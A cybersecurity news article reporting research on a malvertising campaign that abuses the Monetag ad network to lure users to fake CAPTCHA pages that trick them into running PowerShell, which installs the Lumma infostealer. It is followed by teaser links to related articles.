A large-scale malvertising campaign distributing the Lumma infostealer malware via intrusive “ads” leading to fake CAPTCHA pages has been tied by researchers to a threat actor abusing the Monetag ad network.
Internet users usually land on one of the many thousands SEO-optimized sites using Monetag ad-zone scripts after searching for things like streaming videos, anime, sports, academic documents, etc.
The scripts pop open a new tab, which redirects users to a fake CAPTCHA page that instructs them to verify that they are human by pressing a set of buttons in a specific order.
These actions make it so that the victim pastes a PowerShell script into a Run dialog box and unknowingly executes it by pressing the OK button.
“The malicious pages are frequently updated with new variants to evade detection. Those use different PowerShell one-liners, different script obfuscation to copy the PowerShell script to the clipboard, as well as changes in visual design,” Guardio Labs researchers discovered.
The PowerShell scripts download and execute the powerful Lumma infostealer, just like in these previously flagged campaigns (that may or may not be just one of the stages of this one documented by Guardio).
“In collaboration with Infoblox and through meticulous deobfuscation of JavaScript snippets responsible for triggering ad events, we identified the ad network service responsible—Monetag. Monetag is a subsidiary of PropellerAds, a large ad network company based in Cyprus,” Guardio Labs researchers shared.
The ad network is being leveraged by a threat actor – previously dubbed “Vane Viper” by Infoblox researchers – to distribute malware at a large scale.
The threat actor is using obfuscated scripts, redirect chains, and ad-tracking services like BeMob to conceal their malicious pages and intent from the ad network’s moderators.
The malvertising attack flow (Source: Guardio Labs)
“Over just the past ten days, our analysis estimated up to 1M ‘ad impressions’ per day, arriving from around 3000+ publisher sites,” the researchers pointed out.
The researchers have outlined the flawed ecosystem and buck passing strategy that makes campaigns such as these possible:
“This fragmented chain of ownership creates a perfect storm of plausible deniability, making it exceptionally difficult to pinpoint and enforce accountability. It’s a system designed to shift blame while allowing malicious campaigns to thrive,” Guardio Labs says.
“Ad networks must prioritize ongoing content moderation, robust account validation to prevent fake registrations, and more accessible reporting mechanisms for the cybersecurity community. Waiting for external reports to address such abuses is not enough. These systems require continuous oversight to protect not just their clients but all internet users.”
A critical security configuration in Azure Key Vault has been discovered, potentially allowing users with… Read More
BADBOX is a cybercriminal operation infecting Android devices like TV boxes and smartphones with malware… Read More
KEY SUMMARY POINTS Google Calendar Targeted: Hackers are exploiting Google Calendar’s features to send phishing… Read More
Joseph Cox, author of the 2024 book “Dark Wire: The Incredible True Story of the… Read More
Dec 19, 2024Ravie LakshmananMalware / Botnet Juniper Networks is warning that Session Smart Router (SSR)… Read More
Dec 19, 2024Ravie LakshmananMalware / Botnet Juniper Networks is warning that Session Smart Router (SSR)… Read More